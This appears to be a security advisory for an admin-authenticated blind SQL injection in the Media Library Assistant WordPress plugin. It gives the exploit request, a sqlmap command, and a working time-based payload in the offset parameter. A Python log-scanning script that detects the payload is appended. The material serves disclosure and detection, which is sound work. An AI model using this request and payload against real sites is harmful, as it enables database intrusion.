The Media Library Assistant WordPress plugin was affected by an authenticated (admin+) blind SQL injection vulnerability that is reachable when at least one Custom Field Rule is set in the plugin's options.
There needs to be at least one Custom Field Rule in the plugin's Custom Fields settings (/wp-admin/options-general.php?page=mla-settings-menu-custom_field&mla_tab=custom_field).

Log in as admin and get the mla_admin_nonce parameter from /wp-admin/options-general.php?page=mla-settings-menu-general

Then save the request below in a file, replacing the admin cookies and the nonce parameter with their values:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close
Cookie: [Admin Cookies]

offset=1&length=2&mla_admin_nonce=[NONCE]&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts

$ sqlmap -r sqlmap.txt --level 5 -p offset --risk 3 --technique T --dbms MYSQL
[...]
sqlmap identified the following injection point(s) with a total of 921 HTTP(s) requests:
---
Parameter: offset (POST)
    Type: time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: offset=1 PROCEDURE ANALYSE(EXTRACTVALUE(3522,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x67547748))))),1)-- KPiD&length=2&mla_admin_nonce=1a45dd5fb9&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts
---
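The injection point is the offset parameter of the custom-field mapping AJAX action, and the only working technique sqlmap found was time-based blind, so a defender has two cheap signals: a pagination value that is not a plain integer, and an unusually slow answer from that endpoint. The script below is an added example (it is not part of the WPScan advisory or of the plugin's code) that applies both checks to constructed JSON-lines proxy/WAF log records. The log format, the field names (client_ip, method, path, body, duration_ms) and the 5000 ms threshold are assumptions; the endpoint, action name and the third record's body come from the advisory.

```python
"""Flag suspicious requests to the Media Library Assistant mapping endpoint.

Added example, not part of the WPScan advisory or the plugin. Reads constructed
JSON-lines proxy/WAF records and reports requests whose `offset` or `length`
value is not a plain integer, or which took unusually long to answer.
"""
import json
import re
from urllib.parse import parse_qs

# Endpoint and action taken from the advisory's proof-of-concept request.
AJAX_PATH = "/wp-admin/admin-ajax.php"
MLA_ACTION = "mla-inline-mapping-custom-scripts"
INT_PARAMS = ("offset", "length")  # pagination values that must be integers
INT_RE = re.compile(r"^\d+$")
SLOW_MS = 5000  # assumed threshold; tune to the site's normal response time


def check_record(rec):
    """Return a list of (reason, detail) findings for one log record, or []."""
    if rec.get("method") != "POST" or rec.get("path") != AJAX_PATH:
        return []
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    if params.get("action", [""])[0] != MLA_ACTION:
        return []
    findings = []
    for name in INT_PARAMS:
        value = params.get(name, [""])[0]
        # Anything other than digits (a missing value included) is not what
        # the plugin's own UI sends and is worth a look.
        if not INT_RE.match(value):
            findings.append(("non-integer " + name, value))
    duration = rec.get("duration_ms", 0)
    if duration >= SLOW_MS:
        findings.append(("slow response, possible time-based blind probe", str(duration)))
    return findings


def scan(lines):
    """Scan an iterable of JSON-lines records; return [(client_ip, findings), ...]."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        findings = check_record(rec)
        if findings:
            hits.append((rec.get("client_ip", "?"), findings))
    return hits


# Constructed sample log records (not real traffic). The body of the third
# record is the payload sqlmap reported in the advisory; the first is the
# plugin's legitimate request shape, the second is an unrelated AJAX action.
SAMPLE_LOG = """
{"client_ip": "10.0.0.5", "method": "POST", "path": "/wp-admin/admin-ajax.php", "duration_ms": 120, "body": "offset=1&length=2&mla_admin_nonce=[NONCE]&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts"}
{"client_ip": "10.0.0.5", "method": "POST", "path": "/wp-admin/admin-ajax.php", "duration_ms": 90, "body": "action=heartbeat&offset=abc"}
{"client_ip": "203.0.113.9", "method": "POST", "path": "/wp-admin/admin-ajax.php", "duration_ms": 6400, "body": "offset=1 PROCEDURE ANALYSE(EXTRACTVALUE(3522,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x67547748))))),1)-- KPiD&length=2&mla_admin_nonce=1a45dd5fb9&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts"}
"""

if __name__ == "__main__":
    for client_ip, findings in scan(SAMPLE_LOG.splitlines()):
        for reason, detail in findings:
            print(f"{client_ip}: {reason} ({detail[:60]})")
```

Only the third record is reported, with both reasons; the heartbeat record is ignored because the check is scoped to the vulnerable action, which keeps the rule quiet on a busy admin-ajax.php. Because the bug is only reachable by an administrator, a hit from this rule is also a prompt to review that account's other activity, not just the request.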
Lenon Leite
2020-11-24 (about 2 years ago)